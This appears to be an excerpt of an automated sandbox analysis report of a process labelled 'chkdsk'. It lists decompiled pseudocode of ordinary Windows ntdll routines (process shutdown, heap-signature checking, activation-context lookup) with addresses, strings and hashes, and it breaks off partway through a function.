                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0587D6D0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 67%
                                                                                                                    			E0587D6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push(0x68);
				_push(0x592c5e8);
				_t68 = E058A7BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x5945da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x59437c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E058CE692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x5945dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x5945da8 = 1;
				if( *0x59465f0 != 0) {
					_t137 =  *0x59491f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x59491e0(0x20);
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push(1);
					E05854779(_t74, _t118);
				}
				if(( *0x594391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x5949234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x5949234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x59468c8;
					if( *0x59468c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							E058D0FC8();
							 *0x59468c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						E0587D8F0();
					}
					_t68 = E0587D898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x5945da0; // 0x5294cc0
				L8:
				if(_t129 != 0x5945d9c) {
					_t18 = _t129 - 0x10; // 0x5294cb0
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x5298c78
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x6fb89c90
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						E0586DC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E0586F0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
						E0586DCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						E0587D886();
					}
					goto L8;
				}
				_t119 =  *0x5945b24; // 0x5291e18
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					E0586DC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x5945b24; // 0x5291e18
					E0586F0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					E0587D88F();
				}
				goto L15;
			}


























                                                                                                                    0x0587d6d0
                                                                                                                    0x0587d6d2
                                                                                                                    0x0587d6d7
                                                                                                                    0x0587d6dc
                                                                                                                    0x0587d6e3
                                                                                                                    0x0587d6ed
                                                                                                                    0x0587d810
                                                                                                                    0x0587d813
                                                                                                                    0x0587d81f
                                                                                                                    0x0587d81f
                                                                                                                    0x0587d6f3
                                                                                                                    0x0587d6f9
                                                                                                                    0x0587d6fc
                                                                                                                    0x0587d6ff
                                                                                                                    0x0587d702
                                                                                                                    0x0587d709
                                                                                                                    0x058bf0c2
                                                                                                                    0x058bf0c2
                                                                                                                    0x0587d716
                                                                                                                    0x058bf0cd
                                                                                                                    0x058bf0e7
                                                                                                                    0x058bf0ec
                                                                                                                    0x058bf0ec
                                                                                                                    0x0587d71c
                                                                                                                    0x0587d71f
                                                                                                                    0x0587d724
                                                                                                                    0x0587d732
                                                                                                                    0x0587d86d
                                                                                                                    0x0587d873
                                                                                                                    0x0587d875
                                                                                                                    0x0587d877
                                                                                                                    0x0587d879
                                                                                                                    0x0587d87f
                                                                                                                    0x0587d87f
                                                                                                                    0x0587d738
                                                                                                                    0x0587d740
                                                                                                                    0x0587d742
                                                                                                                    0x0587d744
                                                                                                                    0x0587d744
                                                                                                                    0x0587d750
                                                                                                                    0x058bf0f4
                                                                                                                    0x058bf0f7
                                                                                                                    0x058bf0fe
                                                                                                                    0x058bf101
                                                                                                                    0x058bf108
                                                                                                                    0x058bf10b
                                                                                                                    0x058bf10d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058bf113
                                                                                                                    0x058bf117
                                                                                                                    0x0587d7ed
                                                                                                                    0x0587d7ed
                                                                                                                    0x0587d7f3
                                                                                                                    0x0587d7fa
                                                                                                                    0x058bf13c
                                                                                                                    0x058bf13f
                                                                                                                    0x058bf145
                                                                                                                    0x058bf14a
                                                                                                                    0x058bf14a
                                                                                                                    0x058bf13f
                                                                                                                    0x0587d800
                                                                                                                    0x0587d804
                                                                                                                    0x0587d806
                                                                                                                    0x0587d806
                                                                                                                    0x0587d80b
                                                                                                                    0x00000000
                                                                                                                    0x0587d80b
                                                                                                                    0x0587d756
                                                                                                                    0x0587d756
                                                                                                                    0x0587d75a
                                                                                                                    0x0587d75d
                                                                                                                    0x0587d766
                                                                                                                    0x0587d76c
                                                                                                                    0x0587d76e
                                                                                                                    0x0587d76e
                                                                                                                    0x0587d771
                                                                                                                    0x0587d774
                                                                                                                    0x0587d774
                                                                                                                    0x0587d777
                                                                                                                    0x0587d77a
                                                                                                                    0x0587d77a
                                                                                                                    0x0587d77d
                                                                                                                    0x0587d782
                                                                                                                    0x0587d78d
                                                                                                                    0x0587d794
                                                                                                                    0x0587d799
                                                                                                                    0x0587d79f
                                                                                                                    0x0587d79f
                                                                                                                    0x0587d7a1
                                                                                                                    0x0587d7a7
                                                                                                                    0x0587d7ac
                                                                                                                    0x0587d7af
                                                                                                                    0x0587d7b2
                                                                                                                    0x0587d7b6
                                                                                                                    0x0587d7da
                                                                                                                    0x0587d7da
                                                                                                                    0x0587d7b8
                                                                                                                    0x0587d7b9
                                                                                                                    0x0587d7c0
                                                                                                                    0x0587d7c5
                                                                                                                    0x0587d7cc
                                                                                                                    0x0587d7cf
                                                                                                                    0x0587d7cf
                                                                                                                    0x00000000
                                                                                                                    0x0587d782
                                                                                                                    0x0587d7e1
                                                                                                                    0x0587d7e7
                                                                                                                    0x0587d7eb
                                                                                                                    0x0587d820
                                                                                                                    0x0587d827
                                                                                                                    0x0587d82c
                                                                                                                    0x0587d832
                                                                                                                    0x0587d834
                                                                                                                    0x0587d83a
                                                                                                                    0x0587d83f
                                                                                                                    0x0587d842
                                                                                                                    0x0587d84a
                                                                                                                    0x0587d84f
                                                                                                                    0x0587d856
                                                                                                                    0x0587d856
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-1975516107
                                                                                                                    • Opcode ID: 8195c029cb2041cb71c20fda71e30841b5f3206959b33efee8dd9031c19ee2b3
                                                                                                                    • Instruction ID: 0cdaaed5f52f001281939d704549b1e0896d76978fae322e7b76aa57612944de
                                                                                                                    • Opcode Fuzzy Hash: 8195c029cb2041cb71c20fda71e30841b5f3206959b33efee8dd9031c19ee2b3
                                                                                                                    • Instruction Fuzzy Hash: 2351CF75A093499FDB14DFA8C48ABADBBB2BF44304F148159DC01EB281DB74ED85CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05847662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 29%
                                                                                                                    			E05847662(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0584B910();
					} else {
						E0584B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0584B910("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0584B910(", passed to %s", _t29);
					}
					_push("\n");
					E0584B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x59447a1 = 1;
						asm("int3");
						 *0x59447a1 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                                                                    0x05847667
                                                                                                                    0x05847669
                                                                                                                    0x05847672
                                                                                                                    0x058aad93
                                                                                                                    0x058aadb2
                                                                                                                    0x058aadb7
                                                                                                                    0x058aad95
                                                                                                                    0x058aadaa
                                                                                                                    0x058aadaf
                                                                                                                    0x058aadc3
                                                                                                                    0x058aadcc
                                                                                                                    0x058aadd4
                                                                                                                    0x058aadda
                                                                                                                    0x058aaddb
                                                                                                                    0x058aade0
                                                                                                                    0x058aadf0
                                                                                                                    0x058aadf2
                                                                                                                    0x058aadf9
                                                                                                                    0x058aadfa
                                                                                                                    0x058aadfa
                                                                                                                    0x00000000
                                                                                                                    0x058aae01
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                    • API String ID: 0-3061284088
                                                                                                                    • Opcode ID: 1d73a17e1f0974042f98aa2fa0b63a8f1260578f503456c111f28abf9b1d9a6d
                                                                                                                    • Instruction ID: d56f969a748e9fa6a6c678ea2fa7c7baa7e6711dd5d043c2f3503fbea5bafaf1
                                                                                                                    • Opcode Fuzzy Hash: 1d73a17e1f0974042f98aa2fa0b63a8f1260578f503456c111f28abf9b1d9a6d
                                                                                                                    • Instruction Fuzzy Hash: 2B016D332542A4BEF719932CA40EF6A7FD4EB41B31F180049EC40CBB80DAA89C84E911
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 84%
                                                                                                                    			E0588265C(signed char __ecx, signed int __edx, intOrPtr _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
				signed int _v8;
				char _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				char* _v548;
				short _v550;
				short _v552;
				signed int* _v556;
				signed int* _v560;
				signed int* _v564;
				signed int _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t95;
				intOrPtr _t96;
				void* _t104;
				signed int _t105;
				signed int* _t107;
				void* _t113;
				signed int _t119;
				intOrPtr _t120;
				void* _t121;
				char* _t128;
				void* _t129;
				signed int _t131;
				signed short _t139;
				signed int _t142;
				signed int _t147;
				signed int _t149;
				signed int _t154;

				_t141 = __edx;
				_v8 =  *0x594b370 ^ _t154;
				_v556 = _a12;
				_t128 =  &_v532;
				_v560 = _a8;
				_t147 = 0;
				_v564 = _a16;
				_t142 = 0;
				_v540 = __ecx;
				_v532 = 0;
				_t131 = 0;
				_v552 = 0;
				_t95 = 2;
				_v550 = _t95;
				_t96 = _a4;
				_v536 = 0;
				_v544 = 0;
				_v548 = _t128;
				if(_t96 == 0x582120c) {
					E058DEF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					L39:
					return E05894B50(_t148, _t128, _v8 ^ _t154, _t141, _t142, _t148);
				}
				if(_v560 != 0) {
					 *_v560 =  *_v560 & 0;
					_t147 = 0;
				}
				if(_v556 != _t131) {
					 *_v556 =  *_v556 & _t131;
					_t147 = _t131;
				}
				if(_v564 != _t131) {
					 *_v564 =  *_v564 & _t142;
					_t131 = _t142;
				}
				if((_v540 & 0xfffffffc) != 0 || _t141 == 0 || _v560 == _t142 || _v556 == _t142) {
					_push(_v556);
					_push(_v560);
					_push(_t141);
					_push(_v540);
					E058DEF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags                : 0x%lx\nSXS:    Peb                  : %p\nSXS:    ActivationContextData: %p\nSXS:    AssemblyStorageMap   : %p\n", "RtlpGetActivationContextDataStorageMapAndRosterHeader");
					_t148 = 0xc000000d;
					goto L37;
				} else {
					if(_t96 != 0) {
						if(_t96 == 0xfffffffc) {
							L24:
							_t57 = _t141 + 0x200; // 0x230
							_t131 = _t57;
							_t104 =  *_t131;
							_t58 = _t141 + 0x204; // 0x234
							_t147 = _t58;
							_v536 = _t131;
							_v544 = _t147;
							if(_t104 == 0) {
								L33:
								_t105 =  *_t147;
								L34:
								_t141 = _v556;
								 *_v556 = _t105;
								 *_v560 =  *_t131;
								_t107 = _v564;
								if(_t107 != 0) {
									 *_t107 = _t142;
								}
								_t148 = 0;
								L37:
								if(_t128 != 0 && _t128 !=  &_v532) {
									E05863B90( &_v552);
								}
								goto L39;
							}
							_t142 =  *((intOrPtr*)(_t104 + 0x18)) + _t104;
							L26:
							_t141 = 0;
							if( *_t131 != 0 &&  *_t147 == 0) {
								_t108 =  *(_t142 + 8);
								if( *(_t142 + 8) > 0x3ffffffc) {
									_t148 = 0xc0000095;
									goto L37;
								}
								_t129 = E05865D90(_t131,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xc + _t108 * 4);
								if(_t129 == 0) {
									_t148 = 0xc0000017;
									L51:
									_t128 = _v548;
									goto L37;
								}
								_t141 =  *(_t142 + 8);
								_t67 = _t129 + 0xc; // 0xc
								_t113 = E058833D0(_t129,  *(_t142 + 8), _t67);
								_t148 = _t113;
								if(_t113 < 0) {
									E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
									goto L51;
								}
								_t147 = _v544;
								asm("lock cmpxchg [esi], ecx");
								if(0 != 0) {
									E05849303(_t129);
									E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
								}
								_t131 = _v536;
								_t128 = _v548;
							}
							goto L33;
						}
						if((_v540 & 0x00000003) != 0) {
							goto L12;
						}
						_t55 = _t96 + 0x10; // 0x10
						_t131 = _t55;
						_t141 =  *_t131;
						if(_t141 == 0) {
							_t148 = 0xc00000e5;
							goto L39;
						}
						_t142 =  *((intOrPtr*)(_t141 + 0x18)) + _t141;
						_t105 = _t96 + 0x5c;
						goto L34;
					}
					L12:
					if(_t96 == 0xfffffffc || (_v540 & 0x00000002) != 0) {
						goto L24;
					} else {
						if(_t96 != 0) {
							if((_v540 & 0x00000001) == 0) {
								goto L26;
							}
						}
						_t31 = _t141 + 0x1f8; // 0x228
						_t131 = _t31;
						_t119 =  *_t131;
						_t32 = _t141 + 0x1fc; // 0x22c
						_t147 = _t32;
						_v536 = _t131;
						_v544 = _t147;
						if(_t119 == 0) {
							goto L33;
						}
						_t142 =  *((intOrPtr*)(_t119 + 0x18)) + _t119;
						_v568 = _t142;
						if( *_t147 != 0) {
							goto L26;
						}
						_t120 =  *((intOrPtr*)(_t141 + 0x10));
						_t141 = 0x208;
						_t139 =  *(_t120 + 0x38);
						_t142 =  *(_t120 + 0x3c);
						_t149 = _t139 & 0x0000ffff;
						_v540 = _t139;
						_t41 = _t149 + 0xe; // 0x23a
						_t121 = _t41;
						if(_t121 > 0x208) {
							if(_t121 <= 0xfffe) {
								_v550 = _t139 + 0xe;
								_t128 = E05865D60(_t139 + 0x0000000e & 0x0000ffff);
								_v548 = _t128;
								if(_t128 != 0) {
									L19:
									E058988C0(_t128, _t142, _t149);
									_t131 = _v536;
									_v552 = _v540 + 0xc;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsw");
									_t142 = _v568;
									_t147 = _v544;
									goto L26;
								}
								_t148 = 0xc0000017;
								goto L39;
							}
							_t148 = 0xc0000106;
							goto L39;
						}
						_t128 =  &_v532;
						_v550 = 0x208;
						_v548 = _t128;
						goto L19;
					}
				}
			}



































                                                                                                                    0x0588265c
                                                                                                                    0x0588266e
                                                                                                                    0x05882675
                                                                                                                    0x0588267b
                                                                                                                    0x05882685
                                                                                                                    0x0588268b
                                                                                                                    0x05882691
                                                                                                                    0x05882697
                                                                                                                    0x0588269b
                                                                                                                    0x058826a1
                                                                                                                    0x058826a8
                                                                                                                    0x058826aa
                                                                                                                    0x058826b3
                                                                                                                    0x058826b4
                                                                                                                    0x058826bb
                                                                                                                    0x058826be
                                                                                                                    0x058826c4
                                                                                                                    0x058826ca
                                                                                                                    0x058826d5
                                                                                                                    0x058c1ff1
                                                                                                                    0x058c1ff9
                                                                                                                    0x05882906
                                                                                                                    0x05882916
                                                                                                                    0x05882916
                                                                                                                    0x058826e1
                                                                                                                    0x058826e9
                                                                                                                    0x058826eb
                                                                                                                    0x058826eb
                                                                                                                    0x058826f3
                                                                                                                    0x058826fb
                                                                                                                    0x058826fd
                                                                                                                    0x058826fd
                                                                                                                    0x05882705
                                                                                                                    0x0588270d
                                                                                                                    0x0588270f
                                                                                                                    0x0588270f
                                                                                                                    0x0588271b
                                                                                                                    0x058c20a8
                                                                                                                    0x058c20ae
                                                                                                                    0x058c20b4
                                                                                                                    0x058c20b5
                                                                                                                    0x058c20c9
                                                                                                                    0x058c20d1
                                                                                                                    0x00000000
                                                                                                                    0x05882741
                                                                                                                    0x05882743
                                                                                                                    0x05882813
                                                                                                                    0x0588283c
                                                                                                                    0x0588283c
                                                                                                                    0x0588283c
                                                                                                                    0x05882842
                                                                                                                    0x05882844
                                                                                                                    0x05882844
                                                                                                                    0x0588284a
                                                                                                                    0x05882850
                                                                                                                    0x05882858
                                                                                                                    0x058828d2
                                                                                                                    0x058828d2
                                                                                                                    0x058828d4
                                                                                                                    0x058828d4
                                                                                                                    0x058828da
                                                                                                                    0x058828e4
                                                                                                                    0x058828e6
                                                                                                                    0x058828ee
                                                                                                                    0x058828f0
                                                                                                                    0x058828f0
                                                                                                                    0x058828f2
                                                                                                                    0x058828f4
                                                                                                                    0x058828f6
                                                                                                                    0x058c20e2
                                                                                                                    0x058c20e2
                                                                                                                    0x00000000
                                                                                                                    0x058828f6
                                                                                                                    0x0588285d
                                                                                                                    0x0588285f
                                                                                                                    0x0588285f
                                                                                                                    0x05882863
                                                                                                                    0x05882869
                                                                                                                    0x05882871
                                                                                                                    0x058c205d
                                                                                                                    0x00000000
                                                                                                                    0x058c205d
                                                                                                                    0x0588288e
                                                                                                                    0x05882892
                                                                                                                    0x058c2067
                                                                                                                    0x058c2080
                                                                                                                    0x058c2080
                                                                                                                    0x00000000
                                                                                                                    0x058c2080
                                                                                                                    0x05882898
                                                                                                                    0x0588289b
                                                                                                                    0x058828a1
                                                                                                                    0x058828a6
                                                                                                                    0x058828aa
                                                                                                                    0x058c207b
                                                                                                                    0x00000000
                                                                                                                    0x058c207b
                                                                                                                    0x058828b0
                                                                                                                    0x058828ba
                                                                                                                    0x058828c0
                                                                                                                    0x058c208d
                                                                                                                    0x058c209e
                                                                                                                    0x058c209e
                                                                                                                    0x058828c6
                                                                                                                    0x058828cc
                                                                                                                    0x058828cc
                                                                                                                    0x00000000
                                                                                                                    0x05882863
                                                                                                                    0x0588281c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x05882822
                                                                                                                    0x05882822
                                                                                                                    0x05882825
                                                                                                                    0x05882829
                                                                                                                    0x058c2003
                                                                                                                    0x00000000
                                                                                                                    0x058c2003
                                                                                                                    0x05882832
                                                                                                                    0x05882834
                                                                                                                    0x00000000
                                                                                                                    0x05882834
                                                                                                                    0x05882749
                                                                                                                    0x0588274c
                                                                                                                    0x00000000
                                                                                                                    0x0588275f
                                                                                                                    0x05882761
                                                                                                                    0x058c2014
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058c201a
                                                                                                                    0x05882767
                                                                                                                    0x05882767
                                                                                                                    0x0588276d
                                                                                                                    0x0588276f
                                                                                                                    0x0588276f
                                                                                                                    0x05882775
                                                                                                                    0x0588277b
                                                                                                                    0x05882783
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0588278c
                                                                                                                    0x05882791
                                                                                                                    0x05882797
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0588279d
                                                                                                                    0x058827a0
                                                                                                                    0x058827a5
                                                                                                                    0x058827a8
                                                                                                                    0x058827ab
                                                                                                                    0x058827ae
                                                                                                                    0x058827b4
                                                                                                                    0x058827b4
                                                                                                                    0x058827b9
                                                                                                                    0x058c2024
                                                                                                                    0x058c2033
                                                                                                                    0x058c2043
                                                                                                                    0x058c2045
                                                                                                                    0x058c204d
                                                                                                                    0x058827d2
                                                                                                                    0x058827d5
                                                                                                                    0x058827e8
                                                                                                                    0x058827ee
                                                                                                                    0x058827fd
                                                                                                                    0x058827fe
                                                                                                                    0x058827ff
                                                                                                                    0x05882800
                                                                                                                    0x05882802
                                                                                                                    0x05882808
                                                                                                                    0x00000000
                                                                                                                    0x05882808
                                                                                                                    0x058c2053
                                                                                                                    0x00000000
                                                                                                                    0x058c2053
                                                                                                                    0x058c2026
                                                                                                                    0x00000000
                                                                                                                    0x058c2026
                                                                                                                    0x058827bf
                                                                                                                    0x058827c5
                                                                                                                    0x058827cc
                                                                                                                    0x00000000
                                                                                                                    0x058827cc
                                                                                                                    0x0588274c

                                                                                                                    Strings
                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 058C20C0
                                                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 058C1FE3, 058C20BB
                                                                                                                    • .Local, xrefs: 058827F8
                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 058C1FE8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                    • API String ID: 0-1239276146
                                                                                                                    • Opcode ID: a7f17d137611c5d2af5c0b6cd52e4233ee3288cf1ec0cc276bbfdeab5079b63e
                                                                                                                    • Instruction ID: 97f75cdbe763cf13c88336f3b7c12a5692ae89ddb615f4eb1b369896620028a4
                                                                                                                    • Opcode Fuzzy Hash: a7f17d137611c5d2af5c0b6cd52e4233ee3288cf1ec0cc276bbfdeab5079b63e
                                                                                                                    • Instruction Fuzzy Hash: 48A18C39A0022D9BCB24DF64C888BA9B7B1FF58314F1441EADC0AE7291D7309E85CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058563CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E058563CB(signed int __ecx) {
				signed int _v8;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				char _v100;
				char _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t88;
				intOrPtr _t100;
				signed int _t121;
				void* _t122;
				signed char _t126;
				void* _t128;
				void* _t131;
				void* _t133;
				signed int _t136;
				signed int _t138;

				_t123 = __ecx;
				_t138 = (_t136 & 0xfffffff8) - 0x64;
				_t83 =  *0x594b370 ^ _t138;
				_v8 =  *0x594b370 ^ _t138;
				_t121 = __ecx;
				if(__ecx == 0) {
					L15:
					_pop(_t128);
					_pop(_t133);
					_pop(_t122);
					return E05894B50(_t83, _t122, _v8 ^ _t138, _t126, _t128, _t133);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v104 = 0;
					_v100 = 0;
					_t88 = E05898870( *[fs:0x18] + 0x19c,  &_v104, 8);
					_t138 = _t138 + 0xc;
					if(_t88 != 0) {
						_push(8);
						_push( &_v104);
						_push(0x2c);
						_push(0xfffffffe);
						if(E05892A60() >= 0) {
							_t123 =  *[fs:0x18];
							 *((intOrPtr*)(_t123 + 0x19c)) = _v104;
							 *((intOrPtr*)(_t123 + 0x1a0)) = _v100;
						}
					}
					if(( *(_t121 + 0x28) & 0x00000001) != 0) {
						if(( *(_t121 + 0x38) & 0x00000001) == 0) {
							_t123 = _t121;
							E0586C700(_t121);
							 *(_t121 + 0x28) =  *(_t121 + 0x28) & 0x000000fe;
						}
					}
					if( *((intOrPtr*)(_t121 + 0x2c)) != 0) {
						if(( *(_t121 + 0x38) & 0x00000002) == 0) {
							E0587F1F0(0);
							 *((intOrPtr*)(_t121 + 0x2c)) = 0;
						}
					}
					_t83 =  *(_t121 + 0x48);
					if(_t83 != 0 && ( *(_t83 + 0x10c) & 0x00000001) == 0) {
						_t83 =  *[fs:0x18];
						_t131 = 0x50;
						if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) != 0) {
							if(( *(_t121 + 0x38) & 0x00000004) == 0) {
								E05898F40( &_v92, 0, _t131);
								_t138 = _t138 + 0xc;
								_v72 =  *((intOrPtr*)(_t121 + 0x30));
								_v68 =  *((intOrPtr*)(_t121 + 0x34));
